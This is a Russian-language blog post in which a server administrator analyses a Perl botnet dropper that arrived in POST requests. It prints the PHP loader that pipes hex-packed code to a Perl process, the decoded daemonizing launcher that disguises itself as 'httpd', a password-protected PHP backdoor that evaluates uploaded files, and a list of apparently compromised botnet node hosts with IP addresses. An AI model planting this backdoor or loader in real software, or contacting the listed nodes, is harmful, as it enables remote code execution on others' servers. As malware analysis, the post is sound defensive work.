Скрытие кода, метод 9

Этот метод популярен у ботоводов (т.е. распространителей perl-ботов), зашифрованный код передается непосредственно процессу Perl, запускаемому функцией popen():

error_reporting( 1 );
global $HTTP_SERVER_VARS;
if (@is_resource( $f = @popen( 'perl - E54POCH', "w" ) )) {
	@fwrite( $f, 'eval( pack( "H*", "6368...7d20" ) );eval( pack( "H*", "7573...353b"));' );
	@fflush( $f );
	sleep( 1 );
	@pclose( $f );
	echo "RUN OK";
} else {
	echo "RUN FALSE";
};

Этот код был замечен среди POST-запросов при просмотре через ngrep:

ngrep -tqW byline '^POST'

Сам запросы выглядел так:

T date time source-IP:port -> dest-IP:80 [AP]
POST http://domain.tld/path/file.php HTTP/1.0.
Connection: Close.
Accept: */*.
Host: domain.tld.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322).
Content-Length: 28123.
Content-Type: multipart/form-data; boundary=xYzZY.
.
--xYzZY.
Content-Disposition: form-data; name="p".
.
Ox93Mdpqme8s.
--xYzZY.
Content-Disposition: form-data; name="f"; filename="f.txt".
.
error_reporting(1);global $HTTP_SERVER_VARS; if (@is_resource($f=@popen

Для удобного получения всего файла целиком, file.php был заменен на файл с кодом:

$upl = "";

$uploaddir = '/path/LOGG/';
$uploadfile = $uploaddir . date("Ymd-H:i:s") . ".log";

if (move_uploaded_file($_FILES['f']['tmp_name'], $uploadfile)) {
    echo "Done.\n";
    $upl = "File saved as: LOGG/$uploadfile\n";
}

if (isset( $_POST["p"] )) {
        $logtext = @$_POST["p"];
        $logtext .= "\nFile uploaded to: LOGG\n\n//------\n\n\n";
        $fp = fopen('POST.log', 'a+');
        fwrite($fp, $logtext);
        fclose($fp);
}

В первом исходнике, результат выполнения функции pack() передается функции eval() без каких-то дополнительных преобразований, поэтому логично предположить, что там просто текст. Распаковать его из 16-ричного формата можно так (вторая часть, тело бота):

$text = pack( "H*","7573...353b" );

$fp = fopen( 'bintext.dat', 'w' );
fwrite( $fp, $text );
fclose( $fp );

Таким образом, в bintext.dat получаем исходник perl-бота.

А в первой части марлезонского балета зашифрованного кода производится запуск бота (расшифрованный код):

chdir '/';
open STDIN, '/dev/null';
open STDOUT, '>/dev/null';
open STDERR, '>/dev/null';
my $pid = fork;
sleep(1),exit if $pid;
eval "use POSIX 'setsid'; setsid";
eval { $0 = 'httpd' }

А это исходный код самого файла file.php, которому отправлялись POST-запросы:

<?php
error_reporting( 1 );
global $HTTP_SERVER_VARS;
function say( $t ) {
	echo "$t\n";
}
function testdata( $t ) {
	say( md5( "testdata_$t" ) );
}
echo "<pre>";
testdata( 'start' );
if (md5( $_POST["p"] ) == "aace99428c50dbe965acc93f3f275cd3") {
	if ($code = @fread( @fopen( $HTTP_POST_FILES["f"]["tmp_name"], "rb" ), $HTTP_POST_FILES["f"]["size"] )) {
		eval( $code );
	} else {
		testdata( 'f' );
	};
} else {
	testdata( 'pass' );
}
testdata( 'end' );
echo "</pre>";
?>
Botnet

Список нодов (узлов) из отловленного perl-бота:

foldersys.de:28269 213.203.220.141
diplomni.info:21535 94.155.15.10 
studio-f3.com:28732 94.155.15.16 
hpredictor.info:26922 213.169.63.254 
occi.jp:28331 220.111.38.200 
bodasytradicion.com:24910 148.243.237.131
index.bg:29213 194.12.244.86 
foldersys.com:29190 213.203.220.141
soderco.com:23722 91.121.84.209 
sandwichsupermax.com:28710 88.203.156.60 
norskemagic.com:29490 213.136.34.26 
corenet.artflower.pe.kr:24639 115.68.17.87 
klobouk.fsv.cvut.cz:23388 147.32.129.99 
wobo04.de:21931 94.102.218.136 
europe-webdesign.de:25994 87.238.192.159 
azidong.com:25679 118.129.167.32
2001.asadal.com:28910 110.45.146.38
medic9000.com:20828 211.115.111.116
dream-honda.com:20958 124.146.181.181
bukiba.de:28148 46.4.66.194
kdhoist.com:28352 121.254.216.163
sm-werbung.com:27398 85.214.60.161
wenco-von-der-schlehhecke.de:23856 217.160.222.26
dmprojects.com:22970 62.80.235.38
mydesigna.info:21158 85.214.23.182
infiniteconstruction.co.th:27179 202.142.223.177
legal-alliance.net:27753 211.115.111.116
kaninchen-zucht.de:21659 62.116.180.6
akaza-dc.com:25777 211.115.111.116
soderco.fr:21617 91.121.84.209
chemtris.com:20211 110.45.144.57
daesansanding.co.kr:25697 203.236.241.184
tokyo-sr.net:24216 211.115.111.116

Скорее всего, это взломанные сервера, на которых висит процесс Perl, замаскированный под httpd,  и ждет указаний.


Теги: , , , , , , , ,

Оставить комментарий

Пожалуйста будьте вежливы и пишите по теме. Ваш e-mail никогда не будет опубликован.

Вы должны быть авторизированы,чтобы оставить комментарий.